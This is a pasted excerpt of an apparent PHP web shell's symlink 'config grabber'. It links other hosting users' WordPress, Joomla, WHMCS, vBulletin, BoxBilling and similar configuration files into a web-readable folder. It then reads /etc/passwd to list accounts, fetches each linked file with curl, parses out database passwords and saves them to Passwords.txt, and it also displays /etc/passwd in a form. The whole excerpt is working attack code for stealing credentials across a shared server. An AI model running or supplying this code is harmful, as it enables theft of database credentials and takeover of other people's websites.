  5017. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  5018. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  5019. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  5020. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  5021. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  5022. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  5023. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  5024. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  5025. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  5026. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  5027. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  5028. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  5029. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  5030. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  5031. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  5032. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  5033. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  5034. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  5035. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  5036. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  5037. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  5038. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  5039. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  5040. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  5041. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  5042. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  5043. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  5044. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  5045.  
  5046. //Home4
  5047.  
  5048. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  5049. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  5050. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  5051. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  5052. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  5053. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  5054. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  5055. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  5056. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  5057. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  5058. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  5059. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  5060. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  5061. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  5062. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  5063. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  5064. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  5065. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  5066. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  5067. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  5068. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  5069. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  5070. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  5071. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  5072. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  5073. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  5074. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  5075. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  5076. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  5077. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  5078. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  5079. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  5080. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  5081. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  5082. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  5083. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  5084. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  5085. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  5086. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  5087. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  5088. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  5089. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  5090. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  5091. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  5092. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  5093. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  5094. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  5095. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  5096. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  5097. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  5098. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  5099. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  5100. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  5101. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  5102. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  5103. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  5104. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  5105. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  5106. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  5107. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  5108. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  5109. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  5110. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  5111. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  5112. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  5113. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  5114. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  5115. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  5116. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  5117. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  5118. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  5119. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  5120. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  5121. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  5122. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  5123. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  5124. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  5125. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  5126. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  5127. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  5128. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  5129. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  5130. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  5131. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  5132. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  5133. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  5134. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  5135. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  5136. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  5137. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  5138. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  5139. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  5140. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  5141. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  5142. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  5143. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  5144. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  5145. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  5146. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  5147. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  5148. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  5149. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  5150. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  5151. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  5152. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  5153. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  5154. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  5155. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  5156. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  5157. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  5158. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  5159. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  5160. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  5161. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  5162. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  5163. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  5164. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  5165. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  5166. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  5167. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  5168. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  5169. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  5170. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  5171. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  5172. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  5173. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  5174. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  5175. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  5176. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  5177. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  5178. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  5179. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  5180. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  5181. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  5182. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  5183. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  5184. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  5185. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  5186. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  5187. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  5188. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  5189. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  5190. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  5191. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  5192. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  5193. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  5194. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  5195. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  5196. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  5197. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  5198. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  5199. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  5200. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  5201. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  5202. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  5203. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  5204. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  5205. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  5206. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  5207. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  5208. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  5209. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  5210. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  5211. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  5212. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  5213. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  5214. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  5215. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  5216. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  5217. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  5218. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  5219. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  5220. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  5221. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  5222. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  5223. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  5224. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  5225. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  5226. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  5227. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  5228.  
  5229. }
  5230.  
  5231. //password grab
  5232.  
  5233. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  5234. {
  5235.  
  5236. $ar0=explode($marqueurDebutLien, $text);
  5237. $ar1=explode($marqueurFinLien, $ar0[1]);
  5238. $ar=trim($ar1[0]);
  5239. return $ar;
  5240. }
  5241.  
  5242. $ffile=fopen('Passwords.txt','a+');
  5243.  
  5244.  
  5245. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/AZZATSSIN5/";
  5246. $re=$r;
  5247. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  5248.  
  5249. $users=file("/etc/passwd");
  5250. foreach($users as $user)
  5251. {
  5252.  
  5253. $str=explode(":",$user);
  5254. $usersss=$str[0];
  5255. foreach($confi as $co)
  5256. {
  5257.  
  5258.  
  5259. $uurl=$re.$usersss.$co;
  5260. $uel=$uurl;
  5261.  
  5262. $ch = curl_init();
  5263.  
  5264. curl_setopt($ch, CURLOPT_URL, $uel);
  5265. curl_setopt($ch, CURLOPT_HEADER, 1);
  5266. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  5267. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  5268. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  5269. $result['EXE'] = curl_exec($ch);
  5270. curl_close($ch);
  5271. $uxl=$result['EXE'];
  5272.  
  5273.  
  5274. if($uxl && preg_match('/table_prefix/i',$uxl))
  5275. {
  5276.  
  5277. //Wordpress
  5278.  
  5279. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  5280. if(!empty($dbp))
  5281. $pass=$dbp."\n";
  5282. fwrite($ffile,$pass);
  5283.  
  5284. }
  5285. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  5286. {
  5287.  
  5288. //WHMCS
  5289.  
  5290. $dbp=entre2v2($uxl,"db_password = '","';");
  5291. if(!empty($dbp))
  5292. $pass=$dbp."\n";
  5293. fwrite($ffile,$pass);
  5294.  
  5295. }
  5296.  
  5297.  
  5298. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  5299. {
  5300.  
  5301. //Joomla
  5302.  
  5303. $db=entre2v2($uxl,"password = '","';");
  5304. if(!empty($db))
  5305. $pass=$db."\n";
  5306. fwrite($ffile,$pass);
  5307. }
  5308. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  5309. {
  5310.  
  5311. //Vbulletin
  5312.  
  5313. $db=entre2v2($uxl,"password'] = '","';");
  5314. if(!empty($db))
  5315. $pass=$db."\n";
  5316. fwrite($ffile,$pass);
  5317.  
  5318. }
  5319. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  5320. {
  5321.  
  5322. //Other
  5323.  
  5324. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  5325. if(!empty($db))
  5326. $pass=$db."\n";
  5327. fwrite($ffile,$pass);
  5328. }
  5329. elseif($uxl && preg_match('/dbpass/i',$uxl))
  5330. {
  5331.  
  5332. //Other
  5333.  
  5334. $db=entre2v2($uxl,"dbpass = '","';");
  5335. if(!empty($db))
  5336. $pass=$db."\n";
  5337. fwrite($ffile,$pass);
  5338. }
  5339. elseif($uxl && preg_match('/dbpass/i',$uxl))
  5340. {
  5341.  
  5342. //Other
  5343.  
  5344. $db=entre2v2($uxl,"dbpass = '","';");
  5345. if(!empty($db))
  5346. $pass=$db."\n";
  5347. fwrite($ffile,$pass);
  5348.  
  5349. }
  5350. elseif($uxl && preg_match('/dbpass/i',$uxl))
  5351. {
  5352.  
  5353. //Other
  5354.  
  5355. $db=entre2v2($uxl,"dbpass = \"","\";");
  5356. if(!empty($db))
  5357. $pass=$db."\n";
  5358. fwrite($ffile,$pass);
  5359. }
  5360.  
  5361.  
  5362. }
  5363. }
  5364. echo "<center>
  5365. <a href=\"AZZATSSIN5/root/\">./Server root</a>
  5366. <br><a href=\"AZZATSSIN5/Passwords.txt\">./Passwords</a>
  5367. <br><a href=\"AZZATSSIN5/\">./Configurations</a></center>";
  5368. }
  5369. else
  5370. {
  5371. echo "<center>
  5372. <form method=\"POST\">
  5373. <textarea name=\"passwd\" style=\"border:1px dotted #59E817; width: 543px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#59E817\">";
  5374. $file = '/etc/passwd';
  5375. $read = @fopen($file, 'r');
  5376. if ($read){
  5377. $body = @fread($read, @filesize($file));
  5378. echo "".htmlentities($body)."";
  5379. }
  5380. elseif(!$read)
  5381. {
  5382. $read = @show_source($file) ;
  5383. }
  5384. elseif(!$read)
  5385. {
  5386. $read = @highlight_file($file);
  5387. }
  5388. elseif(!$read)
  5389. {
  5390. for($uid=0;$uid<1000;$uid++)
  5391. {
  5392. $ara = posix_getpwuid($uid);
  5393. if (!empty($ara))
  5394. {
  5395. while (list ($key, $val) = each($ara))
  5396. {
  5397. print "$val:";
  5398. }
  5399. print "\n";
  5400. }}}
  5401.  
  5402. flush();
  5403.  
  5404. echo "</textarea>
  5405. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\" style=\"border:1px dotted #59E817; width: 99; font-family:Tahoma; font-size:10pt; color:#59E817; text-transform:uppercase; height:23; background-color:#0C0C0C\"/></p>
  5406. </form></center>";
  5407. }
  5408. echo "</body>
  5409. ";
  5410. }
  5411. }
  5412. ?>
Add Comment
Please, Sign In to add comment